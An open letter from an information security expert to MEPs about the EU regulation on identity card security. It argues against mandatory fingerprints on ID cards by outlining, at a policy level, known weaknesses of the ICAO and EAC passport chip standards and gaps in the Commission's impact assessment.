Regarding Procedure 2018/0104(COD) on the Security of identity cards of Union citizens and of residence documents issued to Union citizens and their family members

Dear MEPs,

I’m writing to you in my capacity of an expert on information security and data protection as well as a former technical advisor to the Deputy Prime Minister and Minister of Interior of Bulgaria. Legislation and technical requirements for the Bulgarian ID cards were part of my work in 2015–2016 and this is why I feel confident to write on the matter.

I’m writing this in hope that it will be taken into account during the the trialogue meetings. In general, I support the position adopted in the mandate of the European Parliament against mandatory fingerprints on ID cards and hereby provide arguments for it.

I’d like to begin with a statement of general support for the proposed Regulation — I’m all for harmonisation and standardisation of ID cards as well as improving their security. Paper-based identity documents and those without security features (both physical and electronic) are not adequate to the 21st century realities and technological capabilities and so I strongly support legislation toward improving the status quo.

That said, there is one particularly troubling aspect of the proposed Regulation, that I’d like to focus on — the introduction of mandatory fingerprints on the ID card. It is problematic in many aspects, but I will cover primarily the information security one.

The security of existing technologies has not been properly assessed by the Commission in the context of ID cards. The proposal relies entirely on the ICAO standard but fails to investigate its security and to take into account some key differences (although they are mentioned in the impact assessment): a citizen doesn’t carry their passport all the time, and are not obliged by law to do so, which is not true for ID cards in some Member States. Carrying the document all the time increases the potential risks significantly.

The ICAO standard (ICAO Doc 9303) has had a multitude of security problems throughout the years. It has been updated several times because of that, but it still has some fundamental flaws.

Some of the issues with electronic passports and the ICAO standard are covered in the following research papers: https://www.sciencedirect.com/science/article/pii/S0957417414001201, https://eprint.iacr.org/2005/095.pdf , https://eprint.iacr.org/2010/103.pdf as well as this presentation by a security researcher https://www.defcon.org/images/defcon-15/dc15-presentations/dc-15-grunwald.pdf . Additional issues are outlined by the EFF in this position: https://www.eff.org/deeplinks/2012/10/highest-court-european-union-rule-biometrics-privacy

The fundamental problem is that fingerprint data should be read from the chip without intervention from the owner of the document (i.e. no PIN, no button, no opening). This means that trusted authorities (e.g. border guards) should have a means to read the passports and nobody else should have this means. In the world of information security this is possible on a smaller scale, but at the scale of the entire European Union, and in fact, the entire world, it is destined to fail. The way the EAC standard protects fingerprint data in e-passports is by having each country digitally sign a certificate of each other country, and then each country issues short-lived certificates to terminals and border guard devices that can read the fingerprint data. If the key for a single certificate somewhere in the world leaks, it would mean that anyone will be able to read the fingerprints of every citizen.

The countermeasures for that are:

the certificates are short-lived (e.g. 1 day), which introduces operational complexity, but that way a leak would have short-lived effect.

In order to read the chip, an attacker has to be physically very close to the document

an attacker may still need to provide some sort of password that’s obtained from the visual machine-readable zone on the document

Unfortunately, none of these measures are good enough:

Chips have no clock — they can’t know the current time and so the fact that a certificate is short-lived is of little use. They do sync their internal clock data after passing successful checks, but in the Schengen area border check of ID cards may practically never happen.

— they can’t know the current time and so the fact that a certificate is short-lived is of little use. They do sync their internal clock data after passing successful checks, but in the Schengen area border check of ID cards may practically never happen. A sufficiently large and powerful antenna can be used to read contactless chips from up to 2 meters.

A chip can’t prevent brute-force attacks , so guessing the password over a period of time is quite realistic. Furthermore, ID cards, unlike passports, don’t have a cover and their password-related data can be easily visually read (as opposed to passports, where it can only be read if the right page is opened).

, so guessing the password over a period of time is quite realistic. Furthermore, ID cards, unlike passports, don’t have a cover and their password-related data can be easily visually read (as opposed to passports, where it can only be read if the right page is opened). EACv2, the latest standard that covers most of the issues in the research papers is normally backward compatible and so insecure old versions have to also be supported.

Overall, the security is questionable and making fingerprint storage on ID cards mandatory without the proper assessment is a big risk, especially given that fingerprints are becoming a mainstream way of unlocking important possessions — mobile phones, homes, cars. And this is just on the economic side of things; the risk for civil liberties given the questionable security are a whole other topic.

Such issues might be deemed not sufficient if the fingerprint requirements solved actual serious issues. Unfortunately, that is not the case — fingerprints don’t help much in detecting fraudulent use of ID cards. Let’s briefly review three use cases:

Fake / forged documents — fingerprints are not needed in case a malicious actor wants to create a fake passport. In order to establish that a passport has been issued by the proper authority, a simple electronic signature by the issuer on the non-biometric data will suffice.

An issuing country gets its security compromised and malicious actors get fake documents issued — fingerprints don’t help here either, as the malicious actor can issue a perfectly valid document with the correct fingerprints under a fake identity. It became apparent, for example, that the Russian GRU does that for its undercover agents, as reported in an investigation by Bellingcat.

The wrong person using a genuine document — this is reported by the Commission to be an issue that is helped by biometric data. There are three aspects to this:

Face recognition is usually sufficient. If the person uses the card at a border, then automated face recognition can be used (and is currently used at e-gates) in addition to the human inspection. Lost and stolen cards are often reported as missing, and proper information sharing of lost and stolen cards across Member States will be a significant improvement If the citizen has entered the Schengen area (as in the case of Ukrainian citizens entering Poland, reported by the Commission), then no additional border checks will be required, and other public sector authorities won’t be allowed to read the fingerprints anyway.

The impact assessment provided by the Commission (http://ec.europa.eu/transparency/regdoc/rep/10102/2018/EN/SWD-2018-110-F1-EN-MAIN-PART-1.PDF) does have some important findings that don’t seem to be taken into account in the final proposal:

“Following five year investigation into the operational needs for a biometric identifier which balances effectiveness to achieve this identification purpose with practicality privacy laws, ICAO specified that facial recognition become the globally interoperable biometric technology, accessed contactlessly, with fingerprints or iris recognitions as options in support”

It is worth noting that the impact assessment by the Commission wrongly states that Bulgaria is to introduce contactless ID cards with biometrics. Precisely because of the reasons stated above, the Bulgarian legislation makes biometrics optional on the ID card and biometrics will be stored on the card only if a citizen explicitly wishes so (i.e. opt-in).

An opinion by the regulatory scrutiny board ( http://ec.europa.eu/transparency/regdoc/rep/2/2018/EN/SEC-2018-195-1-EN-MAIN-PART-1.PDF) has the same criticism towards the lack of security assessment:

“In view of the sensitive nature of the (biometric) information that would be stored on the ID and residence documents, the report needs to be more specific on how data protection would be ensured. It should describe the measures and techniques used to restrict access to personal data”

The final impact assessment states that Section 8.2. has been updated accordingly, but it only contains vague recommendations. It lacks any substantial analysis on the security of the proposal — e.g. it mentions EAC (extended access control) but fails to mention that only version 2 of the protocol should be admissible. BAC (basic access control) is also generally not recommended but it is mentioned in the recommendations, while the PACE protocol, which is a more recent improvement, is not specified. It is worth noting, however, that some implementations of the PACE protocol rely on patented algorithms which might mean Member States having to pay royalties per card and per card reader.

The impact assessment also states that:

“Under options ID 2) and ID 3) citizens will be required to provide their fingerprints when ID cards are requested. This obligation interferes with the fundamental rights to privacy and data protection. While in the Schwarz case the CJEU held that the interference with regard to passports is proportionate to the objective of maintaining security, in the context of ID cards the threshold for satisfying the necessity test may be higher, because ID cards are compulsory in some Member States in which fingerprints are not currently collected.“

Yet, no additional security measures are envisioned or implied, apart from the ICAO Doc 9303 standard.

With all of the above arguments taken into account, I’d like to advise on not adopting the mandatory storage of fingerprints in ID cards. If such a measure is to be taken, it has to be more thoroughly assessed from a technical and information security perspective as well as regarding its effectiveness in solving the problems at hand. It is currently not demonstrated and not clear whether fingerprints stored in ID cards will be secure enough to protect the rights of citizens and whether they are required to solve the problems of identity document fraud.

Best regards,

Bozhidar Bozhanov